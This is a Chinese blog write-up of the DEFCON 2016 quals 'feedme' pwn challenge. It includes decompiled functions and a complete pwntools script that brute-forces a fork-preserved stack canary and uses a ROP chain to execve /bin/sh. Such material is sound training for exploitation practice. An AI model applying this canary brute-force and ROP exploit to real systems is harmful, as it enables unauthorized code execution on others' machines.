defcon quals 2016 feedme writeup

最新推荐文章于 2023-02-09 18:03:30 发布
最新推荐文章于 2023-02-09 18:03:30 发布
阅读量859 收藏
点赞数
分类专栏: ctf pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29343201/article/details/74719076
版权
ctf 同时被 2 个专栏收录
50 篇文章 2 订阅
订阅专栏
pwn
37 篇文章 3 订阅
订阅专栏

题目

基本信息

一个32位的二进制文件,静态链接
checksec:

[*] '/home/vagrant/ctf/practice/defcon-2016/pwn/feedme/feedme'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

这里有一点小问题,估计是因为静态链接带来的问题,其实canary是开了的。

分析

首先使用flirt,利用别人已经整理好的sig 文件,导入到ida当中,可以分析出一些函数签名,之后进行分析后的函数大致如下:

main

int __cdecl main(int argc, const char **argv, const char **envp)
{
  __bsd_signal(14, signal_handler);
  alarm(0x96u);
  _IO_setvbuf(off_80EA4C0, 0, 2, 0);
  _IO_new_fclose(off_80EA4BC);
  real_main();
  return 0;
}

real_main

void real_main()
{
  unsigned __int8 v0; // al@3
  int v1; // [sp+10h] [bp-18h]@1
  unsigned int i; // [sp+14h] [bp-14h]@1
  const struct timespec *forked_pid; // [sp+18h] [bp-10h]@2
  int v4; // [sp+1Ch] [bp-Ch]@4

  v1 = 0;
  for ( i = 0; i <= 0x31F; ++i )
  {
    forked_pid = fork();
    if ( !forked_pid )
    {
      v0 = proc_main();
      printf("YUM, got %d bytes!\n", v0);
      return;
    }
    v4 = __waitpid(forked_pid, &v1, 0);
    if ( v4 == -1 )
    {
      _IO_puts("Wait error!");
      exit(-1);
    }
    if ( v1 == -1 )
    {
      _IO_puts("Child IO error!");
      exit(-1);
    }
    _IO_puts("Child exit.");
    _IO_fflush(0);
  }
}

proc_main

int sub_8049036()
{
  unsigned __int8 v0; // ST1B_1@1
  char *global_ptr; // eax@1
  int v2; // ecx@1
  int result; // eax@1
  char v4; // [sp+1Ch] [bp-2Ch]@1
  int v5; // [sp+3Ch] [bp-Ch]@1

  v5 = *MK_FP(__GS__, 20);
  _IO_puts("FEED ME!");
  v0 = read_a_byte();
  read_to((int)&v4, v0);
  global_ptr = save_to_global((int)&v4, v0, 0x10u);
  printf("ATE %s\n", global_ptr);
  result = v0;
  if ( *MK_FP(__GS__, 20) != v5 )
    __chk_fail_0(v2, *MK_FP(__GS__, 20) ^ v5);
  return result;
}

read_to和read_byte比较显然,就不写出来了,可以很轻松的看出来。

分析

其实总体来说是道水题,最麻烦的地方感觉还是由于静态链接,需要使用flirt去识别一些库函数,然后自己还需要识别一些函数,比如fork就是自己识别的。

逻辑很简单,就是fork之后输入值,还会把输入的值拷到一个全局变量的位置,虽然不知道有什么意义。。。

然后开启了canary,如果栈溢出了,会得到stack smash detected,否则会YUM,然后退出线程。

利用的知识点也很简单,fork之后的canary是不会发生变化的,所以直接爆破canary,然后rop就可以了。

rop我的方法是再通过调用一次read_to去输入/bin/sh,然后设置好各个参数直接execve就行了。

exp.py

from pwn import *
context(os='linux', arch='i386', log_level='debug')

DEBUG = 1
GDB = 1
if DEBUG:
    p = process("./feedme")

def get_canary_test_loop(prefix_str, current_char):
    current_len = len(prefix_str) + 1
    p.recvuntil('FEED ME!')
    p.send(chr(current_len))
    p.send(prefix_str + current_char)
    p.recvuntil('ATE')
    p.recvline()
    get_str = p.recv()
    if 'smash' in get_str or '***' in get_str:
        return False
    elif 'YUM' in get_str:
        return True
    else:
        raise Exception("what the fuck do I get? {}".format(get_str))


def get_canary_single_byte(prefix_str):
    for i in range(0, 0xff):
        if get_canary_test_loop(prefix_str, chr(i)):
            return chr(i)


def get_canary(prefix):
    with_canary = prefix
    one = get_canary_single_byte(with_canary)
    log.success("we got one! {}".format(hex(ord(one))))
    with_canary += one
    two = get_canary_single_byte(with_canary)
    log.success("we got two! {}".format(hex(ord(two))))
    with_canary += two
    three = get_canary_single_byte(with_canary)
    log.success("we got three! {}".format(hex(ord(three))))
    with_canary += three
    four = get_canary_single_byte(with_canary)
    log.success("we got four! {}".format(hex(ord(four))))
    with_canary += four

    log.success("we got whole canary! {}".format(hex(u32(one + two + three + four))))

    return with_canary


def exp(prefix):
    """
0x08049c53 : xor ecx, ecx ; pop ebx ; mov eax, ecx ; pop esi ; pop edi ; pop ebp ; ret ; set ecx = 0
0x0807fc11 : and al, 0xe8 ; cdq ; ret ; set edx=0
0x08049761: int 0x80
0x080bb495 : inc eax ; pop eax ; ret
0x080481c9 : pop ebx ; ret
    """
    fake_ebp = 0xdeadbeef
    read_to_addr = 0x08048e7e
    payload = prefix
    payload += 'b' * 8
    payload += p32(fake_ebp)
    payload += p32(read_to_addr)
    payload += p32(0x08049c53)
    payload += p32(0x080e9000) # ebx, arg1 of read_to
    payload += p32(0x8) # esi, arg2 of read_to(len)
    payload += p32(0xdeadbeef) # edi
    payload += p32(0xdeadbeef) # ebp
    payload += p32(0x0807fc11) # set edx = 0
    payload += p32(0x080bb495) # set eax
    payload += p32(0x0b) # SYS_EXECVE eax
    payload += p32(0x08049761) # int 0x80

    payload = payload.ljust(0x40, '1')

    p.recvuntil('FEED ME!')
    p.send(chr(len(payload)))
    p.send(payload)


def main():
    if GDB:
        raw_input()
    prefix = 'a' * 0x20
    with_canary_prefix = get_canary(prefix)
    exp(with_canary_prefix)
    p.send('/bin/sh\x00')
    p.interactive()


if __name__ == "__main__":
    main()

有点神奇的是我发现我在调用read_to的时候的参数刚好和rop gadget里的几个pop要用到寄存器重合了,不过那几个寄存器不影响后面的执行,所以我就直接把他当参数用了。

Anciety
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python二进制符号_符号执行-基于python的二进制分析框架angr
weixin_39585761的博客
12-20 456
符号执行概述在学习这个框架之前首先要知道符号执行。符号执行技术使用符号值代替数字值执行程序,得到的变量的值是由输入变 量的符号值和常量组成的表达式。符号执行技术首先由King在1976年提出 ,经过三十多年的发展,现在仍然被广泛研究,它在软件测试和程序验证中发挥着重 要作用。符号执行是一种重要的形式化方法和静态分析技术,它使用数学和逻辑 首先定义一些基本概念。程序的路径(path)是程序的一个语句...
记一次CTF过程(Writeup)
_Ralph的博客
01-17 4万+
前言在i春秋平台看到几个ctf练习题,就点进去看看吧,能做就做不能做说明水平有限,还要继续加油(革命尚未成功,同志仍需努力)O(∩_∩)O哈哈~第一题:Robot题目名称:Robot有没有觉得这个题目很熟悉?没错robots.txt!很熟悉。可能解题思路就和robots.txt有关了。访问链接,网页显示位一张机器人的图片,没什么信息,网页源代码同样没有什么具有价值的信息。那我们就抓个包看看吧,用b
暗月内网渗透实战——项目七
最新发布
DG_s1mple
02-09 2622
这一次的内网渗透让我学到了很多新的东西,中间也遇到了很多的困难,不会的地方,不过好在网上有很多大佬已经做过writeup了,让我这个菜鸡不至于卡死现在把整个流程都写下来吧
angr符号执行用例解析——defcon2016quals_baby-re
doudoudouzoule的博客
04-17 2069
用例源码以及二进制文件链接:https://github.com/angr/angr-doc/tree/master/examples/defcon2016quals_baby-re执行二进制文件,发现需要输入13个字符,然后通过一系列计算判断输入字符是否满足约束条件。在IDA里非常清晰可以看见输入错误的字符串及其调用地址:所以avoid_addr=0x402941而正确的字符串以及地址为:可以看...
Defcon China 靶场题 - 内网渗透Writeup
dengzhasong7076的博客
05-12 378
对内网渗透的题目挺感兴趣的,所以做了一发。 先给个拓扑图 1. wordpress http://192.168.1.2/是一个wordpress 文件上传: http://192.168.1.2/wp-content/uploads/ 后台可admin/admin登录 ssh可root/admin登录 2. word cve钓鱼 从配置中看到有个文档web的配置 http的lo...
Defcon - 2015 - 初赛 - r0pbaby writeup
无节操
11-05 3604
资源r0pbaby 程序目的getshell思路查看文件类型$ file r0pbaby r0pbaby: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.24, stripped
DEFCON2018.pdf
02-16
DEFCON2018安全大会rootkit攻防
DEFCON GROUP 010.zip
02-25
2. **DEFCON24 CTF决赛回顾.pdf** - DEFCON 24是2016年的活动,CTF(Capture The Flag)是网络安全竞赛,参与者通常需要展示破解、防御和逆向工程等技能。这份PDF文件很可能是对那次决赛的总结报告,包含了比赛策略...
Defcon - 2015 - 初赛 - r0pbaby writeup-附件资源
03-02
Defcon - 2015 - 初赛 - r0pbaby writeup-附件资源
DEFCON_24_决赛介绍.pdf
08-08
Outlines •DEFCON CTF •Cyber Grand Challenge •Our experience •Fight for defcon25
defcon-ctf qualifer crypto writeup
zhang14916的博客
05-29 828
ooo-flag-sharing 阅读题目,我们发现这是一个密钥分享的密码系统。题目使用100*5的矩阵A对填充为5*1明文向量C(向量第一个数是明文)加密得到100*1的向量B。在系统中保存部分向量数据b1,b2……,并将剩下的向量数据b3,b4……分发。当我们和系统由于5个向量数据b1,b2,b3,b4,b5。我们就可以将A中对应向量行组合成一个新矩阵,并求得逆矩阵。我们将的第一行(s1,s2,s3,s4,s5)和密文向量(b1,b2,b3,b4,b5)相乘即为明文。 ...
quals与==的区别
vstian的专栏
07-22 766
public class test {/*** */public test() {    }/*** @param args*/public static void main(String[] args) {   String a = null;   String b = "NULLString";   /*if (a.equals("null")){    System.out.pr
网站综合渗透实验 writeup
3569
07-30 2430
感受 ,做这些实验主要难点我感觉就是上传webshell 了,他插入shell的姿势让我防不胜防,这里插那里插,上一个实验还需要闭合引号,这个实验不用闭合引号,上个实验路径比较简单,这个实验路径比较复杂,尤其是 bear.asp的文件是数据库文件 … 想了好久才想通,到底为什么不用闭合引号 … 为什么路径是/db/bear.asp … 上传sehll有两种方法,都学习了是不吃亏的哦 ~实验过程 :
170916 逆向-WHCTF(BabyRe/CrackMe)
whklhhhh的博客
09-16 3650
1625-5 王子昂 总结《2017年9月16日》 【连续第349天总结】 A. XCTF-Reverse B.CRACKME无壳,C++ 打开是一个简单的输入框和注册按钮 点击注册按钮会弹框“哎,注册码错了,你得换个新的哟!”IDA没有main函数,看起来是MFC写的 查找字符串、断GetDlgText等API都没有结果 说明字符串都被加密过了IDA逐个函数查找,发现有两个函数调用了
全国大学生信息安全竞赛writeup--珍贵资料(reverse200)
jmp esp
07-10 6948
描述你无意间得到了一些珍贵资料,可惜他们看起来不知道是什么,据说解开它可以得到flag神器。 tips:flag是flag{结果}附件描述:文件名:珍贵资料.zip校验(SHA1):4EF84DF5B34C12DED8EC3F603CFBC065251864B4思路一个压缩文件,打开解压得到unknown和unknown2,unknown2是一个apk,unknown不知道是啥。安装apk得到一个登
windows内网渗透PTH/PTK攻击
ATpiu的博客
07-18 6181
前言 windows内网渗透中,有三种最常用的pass系列攻击: pass the hash(hash传递攻击,简称pth) pass the ticket(票据传递攻击,简称ptt) pass the key(密钥传递攻击,简称ptk) 1.1 pass the hash攻击 1.1.1 NTLM HASH windows用户hash主要由以下部分组成,其中NTLM-HASH比LM-HASH的安全性要更高: 用户名称:RID:LM-HASH值:NTLM-HASH值 自Windows Vista和Wi
绿盟杯NSCTF(CCTF)2017 pwn writeup
jmp esp
07-22 6014
前言比赛有无数值得吐槽的地方,其中最主要的是,题目给了pwn的libc,然而,特么是错的,也就是说虽然给了libc,但是其实还是靠运气/当做没有libc解,顺手记录一下这两个水题。pwn1分析mainint __cdecl main() { alarm(0x1u); setbuf(stdin, 0); setbuf(stdout, 0); setbuf(stderr, 0); p
HITCON CTF 2015 Quals Web 出題心得
weixin_33989058的博客
03-08 384
orange.tw · 2015/10/20 1:31作者: [email protected]Blog: blog.orange.twp.s. 相關代碼皆放在 Github 上,有興趣研究之同學可以先看看代碼嘗試解解看後在敘述!寫在 HITCON CTF 2015 Quals 之後作為出題團隊的一員,不得不說這次的難度真的不是有點高而已XD不過就身為 DEFCON 種子賽我覺得可以說是名符其實!...
CTF writeup 1_网络安全实验室
热门推荐
Troy
10-26 31万+
基础关1.key在哪里? 过关地址打开网址 “key就在这里中,你能找到他吗? ” 看看源代码有没有线索~果然<html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> </head> <body> key就在这里中,你能找到他吗?
DEFCON2018安全大会:深入探讨Rootkit攻防
"DEFCON2018USA的演讲由网络安全专家亚历山大·博格斯(Alexandre Borges)进行,主题是‘Ring0/-2 Rootkits: Compromising Defenses’,探讨了高级恶意软件和根套件的攻防策略。博格斯是一名 malware 和安全研究者,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值